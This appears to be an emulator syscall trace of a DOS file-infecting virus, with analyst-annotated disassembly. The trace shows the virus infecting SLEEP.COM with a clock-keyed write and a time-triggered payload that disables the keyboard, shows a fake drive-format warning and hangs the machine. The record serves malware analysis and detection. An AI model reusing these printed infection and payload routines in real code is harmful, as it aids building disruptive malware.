2018-12-25T12:27:45.080494188Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl
; Disassembly window starting at the return address of a "Get time" call
; (INT 21h AH=2Ch: CH=hour, CL=minute). The compare above is the trigger
; test: the payload below runs only when hour == minute. In this run it did
; run: the next log entry is the "Display string" call at PC 12cd8.
0x12cc4: je 0x12cc7  ; equal -> payload
0x12cc6: ret  ; not equal -> return to the caller (outside this window)
0x12cc7: cli
0x12cc8: mov al, 0xad
0x12cca: out 0x64, al  ; port 0x64 is the keyboard-controller command port; command 0xAD disables the keyboard interface
0x12ccc: nop
0x12ccd: sti
0x12cce: mov dx, di
0x12cd0: add dx, 0x215  ; DX = DI + 0x215, address of the '$'-terminated message
0x12cd4: mov ah, 9
0x12cd6: int 0x21  ; INT 21h AH=09h; logged with the fake "Proced with Format" prompt text
0x12cd8: cli
0x12cd9: jmp 0x12cd9  ; jump-to-self with maskable interrupts off; no disk call follows the message in this window
0x12cdb: add word ptr [bx], di  ; NOTE(review): unreachable after the self-jump; the bytes from here on (01 3F 3F ...) are most likely data decoded as instructions
0x12cdd: aas  ; 0x3F is also ASCII '?'
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-25T12:27:45.083322471Z 9 PC: 12cd8 | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)? Yes Ok')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":10339,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:44.806524663Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:44.808429596Z 78 PC: 12ab5 | Find first file
2018-12-25T12:27:44.814293395Z 47 PC: 12abb | Get disk transfer address
2018-12-25T12:27:44.815812597Z 67 PC: 12c40 | Get or set file attributes
2018-12-25T12:27:44.822651438Z 67 PC: 12c48 | Get or set file attributes
2018-12-25T12:27:44.838214001Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:44.844295561Z 87 PC: 12c55 | Get or set file date and time
2018-12-25T12:27:44.846282246Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:44.853019492Z 66 PC: 12b17 | Move file pointer
2018-12-25T12:27:44.854874746Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx
; Disassembly window starting at the return address of the "Get time" call
; (op 44 = INT 21h AH=2Ch: CH=hour, CL=minute, DH=second, DL=hundredths),
; here for the file opened as 'SLEEP.COM'. The xor above and the one below
; fold all four fields into one byte in CH. The routine begins before this window.
0x12a6f: xor ch, cl
0x12a71: mov byte ptr [di + 0x10], ch  ; save that byte at [di+0x10]; presumably the key for the routine called next
0x12a74: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the 64 KiB segment, so the real target is probably 0x12a4e; confirm against the raw bytes
0x12a77: pop bx  ; drops one word (BX is overwritten by the popaw below); the matching push is not in this window
0x12a78: popaw
0x12a79: mov ah, byte ptr [di + 9]  ; function number read from memory; the trace logs op 64 (AH=40h, write)
0x12a7c: mov cx, 0x297  ; 0x297 = 663 bytes, matching the logged write
0x12a7f: mov dx, di  ; DS:DX = buffer at DI
0x12a81: int 0x21  ; logged as "Write 663 bytes on handle 5" at PC 12a83
0x12a83: pushaw
0x12a84: call 0x22a4e  ; same routine again after the write; presumably undoes the first call on the in-memory copy (TODO confirm)
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
0x12a8a: xchg di, si  ; start of a different routine; cut off by the window
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-25T12:27:44.857942108Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-25T12:27:44.867235296Z 66 PC: 12b35 | Move file pointer
2018-12-25T12:27:44.868567591Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:44.875142267Z 87 PC: 12b5e | Get or set file date and time
2018-12-25T12:27:44.877128599Z 62 PC: 12b64 | Close file
2018-12-25T12:27:44.884765842Z 67 PC: 12b6b | Get or set file attributes
2018-12-25T12:27:44.894899073Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.902484292Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.903685533Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.907356327Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.914019082Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:44.922179214Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:44.923176002Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:44.931160939Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:44.932999595Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:44.936326007Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:44.945770284Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:44.947308319Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:44.953537829Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:44.955644973Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:44.963524756Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:44.973243875Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:44.977028767Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:44.97836952Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:44.984046937Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:44.994293589Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.00665702Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.008289166Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.015466991Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.017341843Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.020019051Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.028704345Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.03062793Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.036924622Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.038320019Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.045671622Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.055246569Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.05804049Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.060069311Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.066214535Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.075651861Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.08327181Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.08508248Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.091478737Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.093867026Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.096453169Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.104681178Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.107095698Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.112659702Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.113735324Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.1223243Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.132829035Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.135358062Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.13698813Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.142452854Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.151886416Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.15892251Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.160315914Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.166440519Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.168697181Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.17108714Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.1792957Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.182104785Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.193599427Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.195270285Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.204164669Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.213642834Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.216076748Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.217699819Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.223253417Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.232973505Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.240252081Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.241997686Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.248633284Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.251196284Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.253966502Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.262924775Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.265438385Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.272804982Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.27455621Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.282465611Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.296933504Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.301022523Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.302111287Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.310173747Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.321780658Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.334327792Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.343092413Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.359841551Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.362218422Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.380336965Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.393853116Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.395575021Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.403101489Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.405136719Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.413009673Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.424220923Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.427453953Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.428834112Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.436210795Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.446312893Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.458023905Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.460516187Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.467914711Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.469767808Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.477483987Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.487571567Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.490982907Z 78 PC: 12c03 | Find first file
2018-12-25T12:27:45.501673609Z 78 PC: 12c03 | Find first file (See above)
2018-12-25T12:27:45.507278083Z 78 PC: 12b95 | Find first file
; Analyst annotation: disassembly window that starts where the "Get time" call
; (op 44 = INT 21h AH=2Ch) returns. DOS hands back CH = hour and CL = minute, so
; the first instruction is a time trigger: the payload runs only when hour == minute.
; In this run the next logged call is "Set disk transfer address" at 12ad4, which
; suggests the branch was not taken and the routine simply returned.
2018-12-25T12:27:45.515454422Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl  ; trigger check: hour == minute?
0x12cc4: je 0x12cc7  ; equal -> payload at 0x12cc7
0x12cc6: ret  ; not equal -> return with no visible effect
0x12cc7: cli  ; interrupts off around the controller write
0x12cc8: mov al, 0xad  ; 0xAD = 8042 keyboard-controller "disable keyboard" command
0x12cca: out 0x64, al  ; port 0x64 = controller command port; keystrokes stop reaching the system
0x12ccc: nop
0x12ccd: sti  ; interrupts back on so DOS can print
0x12cce: mov dx, di
0x12cd0: add dx, 0x215  ; DX = DI + 0x215, the message offset (DI is presumably the code's base address - confirm)
0x12cd4: mov ah, 9  ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12cd6: int 0x21
0x12cd8: cli
0x12cd9: jmp 0x12cd9  ; jumps to itself with interrupts disabled: the machine hangs until reset
; NOTE(review): everything below is unreachable after the self-jump and is probably
; data swept up by the linear disassembler. `aas` encodes as 0x3F ('?'), so this run
; looks like a wildcard/placeholder field rather than code - confirm against the raw bytes.
0x12cdb: add word ptr [bx], di
0x12cdd: aas
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-25T12:27:45.517161632Z 26 PC: 12ad4 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10339,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:45.301369045Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:45.303324802Z 78 PC: 12ab5 | Find first file
2018-12-25T12:27:45.309651721Z 47 PC: 12abb | Get disk transfer address
2018-12-25T12:27:45.311126633Z 67 PC: 12c40 | Get or set file attributes
2018-12-25T12:27:45.318457928Z 67 PC: 12c48 | Get or set file attributes
2018-12-25T12:27:45.334801857Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:45.342477838Z 87 PC: 12c55 | Get or set file date and time
2018-12-25T12:27:45.345005204Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:45.35226746Z 66 PC: 12b17 | Move file pointer
; Analyst annotation: disassembly window that starts where the "Get time" call
; (op 44 = INT 21h AH=2Ch; CH = hour, CL = minute, DH = seconds, DL = hundredths)
; returns. The time fields are folded into one byte and stored, a helper is called
; immediately before and after a 0x297-byte write, and the routine returns.
; NOTE(review): this shape is what a time-keyed encoder would look like (encode,
; write, decode the in-memory copy again); the helper body is not shown, so confirm.
; If so, each written copy differs byte-for-byte and a fixed signature over the
; 663-byte body is unreliable; the call sequence in the surrounding log is the
; steadier indicator.
2018-12-25T12:27:45.354004917Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx  ; mix hour/minute with seconds/hundredths
0x12a6f: xor ch, cl  ; fold the result into the single byte CH
0x12a71: mov byte ptr [di + 0x10], ch  ; store that byte at DI+0x10 (presumably the key slot - confirm)
0x12a74: call 0x22a4e  ; helper, first call; shown target is probably 0x12a4e (16-bit offset wrap not applied by the disassembler) - confirm
0x12a77: pop bx
0x12a78: popaw  ; restore registers; the matching push is outside this window
0x12a79: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the log records the resulting call as op 64 (Write)
0x12a7c: mov cx, 0x297  ; length = 0x297 = 663 bytes, matching "Write 663 bytes" in the next log line
0x12a7f: mov dx, di  ; buffer = DS:DI
0x12a81: int 0x21
0x12a83: pushaw
0x12a84: call 0x22a4e  ; same helper again, after the write
0x12a87: pop bx
0x12a88: popaw
0x12a89: ret
; NOTE(review): a different routine starts here and is cut off by the window.
; pop si / sub si, 6 resembles a position-independent base-address calculation - confirm.
0x12a8a: xchg di, si
0x12a8c: pop si
0x12a8d: sub si, 6
0x12a90: push si
0x12a91: add si, 0x185
2018-12-25T12:27:45.356720831Z 64 PC: 12a83 | Write file or device (Write 663 bytes on handle 5)
2018-12-25T12:27:45.36730759Z 66 PC: 12b35 | Move file pointer
2018-12-25T12:27:45.368832208Z 64 PC: 12b55 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:45.380696238Z 87 PC: 12b5e | Get or set file date and time
2018-12-25T12:27:45.384549502Z 62 PC: 12b64 | Close file
2018-12-25T12:27:45.393223232Z 67 PC: 12b6b | Get or set file attributes
2018-12-25T12:27:45.403479292Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.407616219Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.409054105Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.414986135Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.425746823Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.4333578Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.434976821Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.441964494Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.443587365Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.446065659Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.455266064Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.456915047Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.463371462Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.46527045Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.473816007Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.483677677Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.487226065Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.488902301Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.494738944Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.504997709Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.518381096Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.520061758Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.526725059Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.529316696Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.531965693Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.540464584Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.543141387Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.54856083Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.549653585Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.554857184Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.561271802Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.563714661Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.565382355Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.571140819Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.580466246Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.587106695Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.589313248Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.595579185Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.596951635Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.600166198Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.60812231Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.609486749Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.616393247Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.618048366Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.625639488Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.635960057Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.638773646Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.639609326Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.643799657Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.650062122Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.654307725Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.655875194Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.659906866Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.660975388Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.662771569Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.668401446Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.669467024Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.674496641Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.676827494Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.68434199Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.693798986Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.696502081Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.697745526Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.70345033Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.716552331Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.722794791Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.724032727Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.730851897Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.732211768Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.734804492Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.744513174Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.74605427Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.752469334Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.755009775Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.762866796Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.772519151Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.77667055Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.778224254Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.783803831Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.793894265Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.800691422Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.802259583Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.809268801Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T12:27:45.811141984Z 44 PC: 12a6d | Get time (See above)
2018-12-25T12:27:45.813670807Z 64 PC: 12a83 | Write file or device (See above)
2018-12-25T12:27:45.822031736Z 66 PC: 12b35 | Move file pointer (See above)
2018-12-25T12:27:45.824315099Z 64 PC: 12b55 | Write file or device (See above)
2018-12-25T12:27:45.831034743Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.832430682Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.841011163Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.850540722Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.85328574Z 47 PC: 12abb | Get disk transfer address (See above)
2018-12-25T12:27:45.855524316Z 67 PC: 12c40 | Get or set file attributes (See above)
2018-12-25T12:27:45.861180251Z 67 PC: 12c48 | Get or set file attributes (See above)
2018-12-25T12:27:45.871095737Z 61 PC: 12c4e | Open file (See above)
2018-12-25T12:27:45.878592773Z 87 PC: 12c55 | Get or set file date and time (See above)
2018-12-25T12:27:45.879994076Z 63 PC: 12af4 | Read file or device (See above)
2018-12-25T12:27:45.886293466Z 87 PC: 12b5e | Get or set file date and time (See above)
2018-12-25T12:27:45.889001321Z 62 PC: 12b64 | Close file (See above)
2018-12-25T12:27:45.896160064Z 67 PC: 12b6b | Get or set file attributes (See above)
2018-12-25T12:27:45.909740474Z 79 PC: 12ab5 | Find next file (See above)
2018-12-25T12:27:45.913967263Z 78 PC: 12c03 | Find first file
2018-12-25T12:27:45.920459861Z 78 PC: 12c03 | Find first file (See above)
2018-12-25T12:27:45.926203295Z 78 PC: 12b95 | Find first file
; Analyst annotation: disassembly window that starts where the "Get time" call
; (op 44 = INT 21h AH=2Ch) returns. DOS hands back CH = hour and CL = minute, so
; the first instruction is a time trigger: the payload runs only when hour == minute.
; In this run the next logged call is "Display string" at PC 12cd8, i.e. the payload
; branch was taken. That is consistent with the Hour 0 / Min 0 settings in the JSON
; line ahead of this run, if that line configures it - confirm.
; For triage: the visible log ends at the string display; no disk-format operation
; appears in it, and the message text already contains its own "Yes" answer.
2018-12-25T12:27:45.932828674Z 44 PC: 12cc2 | Get time 0x12cc2: cmp ch, cl  ; trigger check: hour == minute?
0x12cc4: je 0x12cc7  ; equal -> payload at 0x12cc7
0x12cc6: ret  ; not equal -> return with no visible effect
0x12cc7: cli  ; interrupts off around the controller write
0x12cc8: mov al, 0xad  ; 0xAD = 8042 keyboard-controller "disable keyboard" command
0x12cca: out 0x64, al  ; port 0x64 = controller command port; keystrokes stop reaching the system
0x12ccc: nop
0x12ccd: sti  ; interrupts back on so DOS can print
0x12cce: mov dx, di
0x12cd0: add dx, 0x215  ; DX = DI + 0x215, the message offset (DI is presumably the code's base address - confirm)
0x12cd4: mov ah, 9  ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12cd6: int 0x21
0x12cd8: cli
0x12cd9: jmp 0x12cd9  ; jumps to itself with interrupts disabled: the machine hangs until reset
; NOTE(review): everything below is unreachable after the self-jump and is probably
; data swept up by the linear disassembler. `aas` encodes as 0x3F ('?'), so this run
; looks like a wildcard/placeholder field rather than code - confirm against the raw bytes.
0x12cdb: add word ptr [bx], di
0x12cdd: aas
0x12cde: aas
0x12cdf: aas
0x12ce0: aas
0x12ce1: aas
2018-12-25T12:27:45.934930382Z 9 PC: 12cd8 | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)? Yes Ok')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":10339,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:45.656477839Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:45.657962932Z 78 PC: 12ab5 | Find first file
2018-12-25T12:27:45.666214976Z 47 PC: 12abb | Get disk transfer address
2018-12-25T12:27:45.667735901Z 67 PC: 12c40 | Get or set file attributes
2018-12-25T12:27:45.67430675Z 67 PC: 12c48 | Get or set file attributes
2018-12-25T12:27:46.09736903Z 61 PC: 12c4e | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:46.105020021Z 87 PC: 12c55 | Get or set file date and time
2018-12-25T12:27:46.106965527Z 63 PC: 12af4 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:46.115102051Z 66 PC: 12b17 | Move file pointer
; Analyst annotation: disassembly window that starts where the "Get time" call
; (op 44 = INT 21h AH=2Ch; CH = hour, CL = minute, DH = seconds, DL = hundredths)
; returns. A byte derived from the clock is stored, a helper runs on both sides of
; a 663-byte write, and the routine returns.
; NOTE(review): presumably a clock-keyed encode / write / decode cycle; the helper
; itself is outside this window, so treat that reading as unconfirmed. If it holds,
; written copies will not share a fixed byte pattern, and detection is better
; anchored on the logged call sequence than on the body bytes.
2018-12-25T12:27:46.117230706Z 44 PC: 12a6d | Get time 0x12a6d: xor cx, dx  ; combine hour/minute with seconds/hundredths
0x12a6f: xor ch, cl  ; reduce to one byte in CH
0x12a71: mov byte ptr [di + 0x10], ch  ; saved at DI+0x10 (presumably the key byte - confirm)
0x12a74: call 0x22a4e  ; helper before the write; shown target is probably 0x12a4e, since the disassembler did not wrap the 16-bit offset - confirm
0x12a77: pop bx
0x12a78: popaw  ; register restore; the matching push is not visible here
0x12a79: mov ah, byte ptr [di + 9]  ; function number comes from memory, so no immediate write opcode appears in the code; logged as op 64 (Write)
0x12a7c: mov cx, 0x297  ; 0x297 = 663 bytes, the size reported by the next log line
0x12a7f: mov dx, di  ; source buffer = DS:DI
0x12a81: int 0x21
0x12a83: pushaw
